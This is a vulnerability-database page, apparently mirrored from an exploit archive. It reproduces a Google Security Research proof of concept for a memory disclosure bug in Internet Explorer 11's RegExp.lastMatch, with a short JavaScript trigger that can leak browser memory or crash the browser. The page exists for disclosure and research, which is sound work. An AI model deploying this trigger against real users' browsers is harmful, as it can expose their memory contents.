Lucene search
K

Internet Explorer - RegExp.lastMatch Memory Disclosure Exploit

🗓️ 20 Mar 2018 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 43 Views

Internet Explorer RegExp.lastMatch Memory Disclosure Exploi

Related
Code
/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
 
This was tested on IE11 running on Window 7 64-bit with the latest patches applied.
 
PoC:
 
=========================================
*/
 
<!-- saved from url=(0014)about:internet -->
<script>
 
function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}
 
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
 
function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}
 
main();
 
</script>
 
/*
=========================================
 
Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/

#  0day.today [2018-04-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Mar 2018 00:00Current
6.2Medium risk
Vulners AI Score6.2
EPSS0.56551
43